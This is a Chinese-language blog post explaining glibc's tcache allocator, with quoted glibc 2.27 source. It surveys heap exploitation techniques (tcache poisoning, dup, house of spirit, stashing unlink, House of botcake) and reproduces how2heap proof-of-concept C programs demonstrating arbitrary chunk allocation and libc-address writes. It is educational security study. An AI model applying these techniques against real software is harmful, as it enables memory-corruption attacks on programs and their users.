Zj_W1nd's BLOG

How2Heap(8)——Tcache

2024/07/28

什么是tcache?

就是glibc2.26之后为了再提速,在fastbin上面又加入了一个cache机制叫tcache。每个thread由一个结构体tcache_perthred_struct管理,里面是两个数组,一个管理每条链上的tcache数目,另一个用单向链表连接起chunk,就用一个指针(这个指针直接指向user data)。每条链上最多连7个,并且和fastbin一样也不会重置prev_inuse位,不合并。

总的来说,tcache的思想类似于cpu的cache的感觉但是更加简化(比如没有淘汰替换算法),优先级最高,他还会主动将chunk从其他bin中往自己的链上装。

申请内存上的改动

tcache的优先级很高,从tcache中取chunk的步骤发生在__libc_malloc()中而不是_int_malloc,这意味着如果这个cache起作用了能节省相当大的一部分时间(会在libc_malloc就返回根本不会调用_int_malloc)。tcache遵循后进先出的LIFO原则。

在第一次调用malloc的时候__libc_malloc会初始化tcache。然后如果能取就从tcache中取chunk返回。

下面的源码取自glibc2.27的__libc_malloc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);

MAYBE_INIT_TCACHE ();

DIAG_PUSH_NEEDS_COMMENT;
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif

释放上的改动

free也是优先放入tcache,下面是_int_free中开头的一段代码,可以看到如果还能放下(检查idx和数量)就直接放入tcache并返回。

1
2
3
4
5
6
7
8
9
10
11
12
13
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);

if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif

cache的装入策略

在_int_malloc中,每个size的处理分支都加了一段tcache的代码,fastbin的if分支内添加了如下一段:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
...
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
...

在small bin的分支则是这样一段(大差不差)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;
tcache_put (tc_victim, tc_idx);
}
}
}
#endif

在后续大循环处理unsorted bin的时候,没有tcache的情况下,发现exact fit会直接返回,但有tcache的话会先装进cache然后继续遍历,装满或者遍历结束再返回,chunk会等会返回。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
          if (size == nb)
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;//这个标记启用了说明tcache中有恰好满足要求的chunk,等下用这个判断
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

在往tcache中装chunk的时候维护了一个计数器tcache_unsorted_count,循环末尾如果这个数已经足够大了并且tcache中有我们需要的chunk就从tcache中返回。同时如果遍历结束了(在循环外)并且return_cached被置位那么也从tcache返回,代码略,就是一句话。

1
2
3
4
5
6
7
8
9
10
11
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif

largebin的处理中不涉及tcache。

tcache_get和tcache_put

tcache操作的核心就是最简单的两个函数:tcache_get(取)和tcache_put(存)

核心取的函数在tcache_get上,然而这个函数简单的不能再简单(为了速度,而且是永远内联):

1
2
3
4
5
6
7
8
9
10
11
12
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}

就是从链表头取一个然后count-1。保护就是两个断言,分别检查了idx是不是比最大数量小,然后对应链的tcache是否为空,没有指针检查。

tcache_put也是一样,就是直接一个单向链表插入然后计数+1

1
2
3
4
5
6
7
8
9
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);//这是因为tcache指针直接指向user data
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

这里也能看出,插入永远插入链表头,取也是优先从头取,说明tcache是LIFO结构。

怎么攻击?

简单覆盖tcache_poisoning

和fastbin的思想一样,直接覆盖fd(next)指针,malloc同样大小两次就行。而且没有size检查随便写。

tcache dup

类似fastbin dup。不过这次连开头的double free检查都没了,直接double free就行。

tcache perthread corruption

利用任意地址分配或者类似的技术直接劫持tcache_perthread_struct结构体(这个结构体也在堆上,可能部分写就可以),然后后续的small分配就全可控了。

tcache house of spirit

这位更是这位,直接放poc吧挺难绷的。就fakechunk写个size然后指针指user data直接free就行了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#include <stdio.h>
#include <stdlib.h>

int main()
{
fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n");
fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n");
fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n");
fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n");
fprintf(stderr, "Ok. Let's start with the example!.\n\n");

fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
malloc(1);

fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n");
unsigned long long *a; //pointer that will be overwritten
unsigned long long fake_chunks[10]; //fake chunk region

fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]);

fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
fake_chunks[1] = 0x40; // this is the size


fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");

a = &fake_chunks[2];

fprintf(stderr, "Freeing the overwritten pointer.\n");
free(a);

fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
}

这是利用了在_int_malloc中,如果tcache非空且有剩余(可用calloc触发,calloc不从tcache中选取),会将扫描到的smallbin放入tcache中。而这次连接只检查了第一个bin的完整性。这个攻击可以实现类似于unsorted bin attack的效果,将一个libc地址写入任意地址。如果构造好的话也能任意地址fake chunk分配。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
 /* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;// attack

tcache_put (tc_victim, tc_idx);
}
}
}

以how2heap的poc为例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;

fprintf(stderr, "This file demonstrates the stashing unlink attack on tcache.\n\n");
fprintf(stderr, "This poc has been tested on both glibc 2.27 and glibc 2.29.\n\n");
fprintf(stderr, "This technique can be used when you are able to overwrite the victim->bk pointer. Besides, it's necessary to alloc a chunk with calloc at least once. Last not least, we need a writable address to bypass check in glibc\n\n");
fprintf(stderr, "The mechanism of putting smallbin into tcache in glibc gives us a chance to launch the attack.\n\n");
fprintf(stderr, "This technique allows us to write a libc addr to wherever we want and create a fake chunk wherever we need. In this case we'll create the chunk on the stack.\n\n");
// stack_var emulate the fake_chunk we want to alloc to
fprintf(stderr, "Stack_var emulates the fake chunk we want to alloc to.\n\n");
fprintf(stderr, "First let's write a writeable address to fake_chunk->bk to bypass bck->fd = bin in glibc. Here we choose the address of stack_var[2] as the fake bk. Later we can see *(fake_chunk->bk + 0x10) which is stack_var[4] will be a libc addr after attack.\n\n");

stack_var[3] = (unsigned long)(&stack_var[2]);

fprintf(stderr, "You can see the value of fake_chunk->bk is:%p\n\n",(void*)stack_var[3]);
fprintf(stderr, "Also, let's see the initial value of stack_var[4]:%p\n\n",(void*)stack_var[4]);
fprintf(stderr, "Now we alloc 9 chunks with malloc.\n\n");

//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}

//put 7 tcache
fprintf(stderr, "Then we free 7 of them in order to put them into tcache. Carefully we didn't free a serial of chunks like chunk2 to chunk9, because an unsorted bin next to another will be merged into one after another malloc.\n\n");

for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}

fprintf(stderr, "As you can see, chunk1 & [chunk3,chunk8] are put into tcache bins while chunk0 and chunk2 will be put into unsorted bin.\n\n");

//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);
free(chunk_lis[2]); // 分隔开防止合并

//convert into small bin
fprintf(stderr, "Now we alloc a chunk larger than 0x90 to put chunk0 and chunk2 into small bin.\n\n");

malloc(0xa0);//>0x90

//now 5 tcache bins
fprintf(stderr, "Then we malloc two chunks to spare space for small bins. After that, we now have 5 tcache bins and 2 small bins\n\n");

malloc(0x90);
malloc(0x90);

fprintf(stderr, "Now we emulate a vulnerability that can overwrite the victim->bk pointer into fake_chunk addr: %p.\n\n",(void*)stack_var);

//change victim->bck
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/

//trigger the attack
fprintf(stderr, "Finally we alloc a 0x90 chunk with calloc to trigger the attack. The small bin preiously freed will be returned to user, the other one and the fake_chunk were linked into tcache bins.\n\n");

calloc(1,0x90);//返回chunk[0]

fprintf(stderr, "Now our fake chunk has been put into tcache bin[0xa0] list. Its fd pointer now point to next free chunk: %p and the bck->fd has been changed into a libc addr: %p\n\n",(void*)stack_var[2],(void*)stack_var[4]);

//malloc and return our fake chunk on stack
target = malloc(0x90);

fprintf(stderr, "As you can see, next malloc(0x90) will return the region our fake chunk: %p\n",(void*)target);
return 0;
}

首先经过堆排布获得5个链好的tcache(2个空位)和两个不会合并的small bin chunk。然后模拟UAF篡改2的bk到我们想要的fake_chunk,这个fake_chunk的bk域写了另一个可写地址target。
最后通过calloc触发攻击。调用calloc的时候_int_malloc将smallbin中的chunk0和2放入tcache,在这个过程中,上面bck->fd=bin的这一行代码会导致我们target+0x10的位置被写入一个libc地址。此时calloc返回先释放的块,chunk2被放在了tcache头。由于LIFO原则,下次malloc会返回2,也就拿到了fake_chunk.

可能是因为只有放进tcache后才能不检查size不检查指针的拿出来smallbin吧。另外在有tcache的情况下也可能这种攻击比unsortedbin更容易。

House of botcake

tcache double free实现任意堆块分配。

  • 用0x110的堆块填满tcache,然后再释放两个相邻的0x110堆块(先a后b)放入unsorted bin并导致合并

  • 取出一个0x110的chunk(从tcache),然后再次释放上一步中的a块,a块此时被放入tcache,这里形成了一个重叠

  • 分配一个0x130的堆块,这会从unsorted bin中合并好的块切割,而这时候我们取得的这个chunk可以拿来修改tcache头部的a块

  • 修改fd后malloc两次即可

leak

2.26版本之后,free的堆块会先进入tcache而不是unsorted bin,而tcache_perthread_struct在堆上不在libc数据段,因此需要先将tcache填满后再free+读才能泄露地址。或者操作超过tcache处理范围的堆块(64位下0x290应该是)。

CATALOG
  1. 1. 什么是tcache?
    1. 1.1. 申请内存上的改动
    2. 1.2. 释放上的改动
    3. 1.3. cache的装入策略
    4. 1.4. tcache_get和tcache_put
  2. 2. 怎么攻击?
    1. 2.1. 简单覆盖tcache_poisoning
    2. 2.2. tcache dup
    3. 2.3. tcache perthread corruption
    4. 2.4. tcache house of spirit
    5. 2.5. tcache stashing unlink attack(new)
    6. 2.6. House of botcake
    7. 2.7. leak